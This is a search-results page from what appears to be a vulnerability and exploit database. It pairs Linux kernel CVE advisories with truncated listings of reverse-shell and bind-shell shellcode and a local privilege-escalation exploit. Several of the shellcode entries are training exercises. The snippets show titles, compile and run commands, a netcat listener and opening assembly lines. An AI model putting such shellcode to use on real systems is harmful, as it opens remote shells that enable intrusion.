52 matches found
Siemens SIMATIC S7-1500 Missing Release of Memory after Effective Lifetime (CVE-2025-39756)
"In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX. When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger...
Siemens SIMATIC Devices Improper Control of Resource Identifiers (CVE-2024-42265)
"In the Linux kernel, the following vulnerability has been resolved: protect the fetch of ->fd[fd] in do_dup2() from mispredictions. Both callers have verified that fd is not greater than ->max_fds; however, misprediction might end up with tofree = fdt->fd[fd]; being speculatively executed. That's wrong for...
SUSE-SU-2025:03384-1 Security update for the Linux Kernel
The SUSE Linux Enterprise 15 SP3 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: - CVE-2022-49492: nvme-pci: fix a NULL pointer dereference in nvme_alloc_admin_tags (bsc#1238954). - CVE-2022-50116: kernel: tty: n_gsm: fix deadlock and link starvation i...
SUSE-SU-2025:03283-1 Security update for the Linux Kernel
The SUSE Linux Enterprise 15 SP5 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: - CVE-2022-49980: USB: gadget: fix use-after-free read in usb_udc_uevent (bsc#1245110). - CVE-2022-50116: tty: n_gsm: fix deadlock and link starvation in outgoing data pa...
UBUNTU-CVE-2025-39756
In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX. When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massi...
CVE-2025-39756
CVE-2025-39756 is a Linux kernel issue where extremely high nr_open values (e.g., 1073741816) can trigger massive file descriptor table allocations that exceed INT_MAX, causing a kernel warning and impractical memory requests (>8GB) during operations near the FD limit. The root cause involves ...
CVE-2025-39756 fs: Prevent file descriptor table allocations exceeding INT_MAX
In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INT_MAX. When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massi...
Security update for the Linux Kernel
The SUSE Linux Enterprise 15 SP4 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: CVE-2022-49138: Bluetooth: hci_event: Fix checking conn for le_conn_complete_evt (bsc#1238160). CVE-2023-52923: netfilter: nf_tables: split async and sync catchall in two...
kernel: protect the fetch of ->fd[fd] in do_dup2() from mispredictions
In the Linux kernel, the following vulnerability has been resolved: protect the fetch of ->fd[fd] in do_dup2() from mispredictions. Both callers have verified that fd is not greater than ->max_fds; however, misprediction might end up with tofree = fdt->fd[fd]; being speculatively executed. That's wrong for t...
Linux/MIPS - N32 MSB Reverse Shell Shellcode
/ mipsn32msblinuxrevsh.c - MIPS N32 MSB Linux reverse Copyright c 2022 Marco Ivaldi Basic MIPS N32 MSB Linux reverse shellcode, showcasing various techniques to avoid badchars. Cross-compile https://buildroot.org/ with: $ mips64-linux-gcc -static mipsn32msblinuxrevsh.c -o revsh Tested on Linux...
Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Exploit Title: Linux/x86 - Bind User Specified Port Shell /bin/sh Shellcode 102 bytes Exploit Author: d7x Tested on: Ubuntu x86 / Linux/x86 Bind Shell /bin/sh with dynamic port binding Null-Free Shellcode 102 bytes Usage: gcc -z execstack -o bindshell bindshell.c ./bindshell 7000 Binding to 7000...
Linux/x86 reverse TCP Shellcode (84 bytes)
Title: Linux/x86 - Reverse TCP Shellcode 84 bytes Author: Xenofon Vassilakopoulos Tested on: Linux 3.13.0-32-generic 57precise1-Ubuntu i686 i386 GNU/Linux Architecture: i686 GNU/Linux Shellcode Length: 84 bytes SLAE-ID: SLAE - 1314 --------------------- Reverse Shellcode ---------------------...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)
/ Title: Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) - Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x86_64 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...
Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes). Shellcode exploit for Linux_x86 platform Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 BYTES Student-ID: SLAE-1233 Note...
Linux/x64 - Reverse (::1:1337/TCP) + IPv6 + Password (pwnd) Shellcode (115 bytes)
Linux/x64 - Reverse (::1:1337/TCP) + IPv6 + Password (pwnd) Shellcode (115 bytes). Shellcode exploit for Linux_x86-64 platform / ; Title : Reverse Shell IPv6 with Password - Shellcode ; Author : Hashim Jawad @ihack4falafel ; OS : Linux kali 4.15.0-kali2-amd64 1 SMP Debian 4.15.11-1kali1 2018-03-21 x86_64...
Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)
/ ; Title: Linux/x86 - TCP reverse shell ; Author: Paolo Perego ; Website: https://codiceinsicuro.it ; Blog post: https://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/ ; Twitter: @thesp0nge ; SLAE-ID: 1217 ; Purpose: connect to a given IP and PORT and spawning a reverse shell if...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
/ Andrea Sindoni - @invictus1306 This shellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Environment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation / Linux_ldso_hwcap.c for CVE-2017-1000366, CVE-2017-1000370 Copyright (C) 2017 Qualys, Inc. my_important_hwcaps() adapted from elf/dl-hwcaps.c, part of the GNU C Library: Copyright (C)...
Linux/x86 - Reverse UDP Shellcode (668 bytes)
; SLAE-X ; thanks to writesup from previous students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might contains null byte if you use certain ip / address %define htonsx x 8 & 0xFF | x & 0x...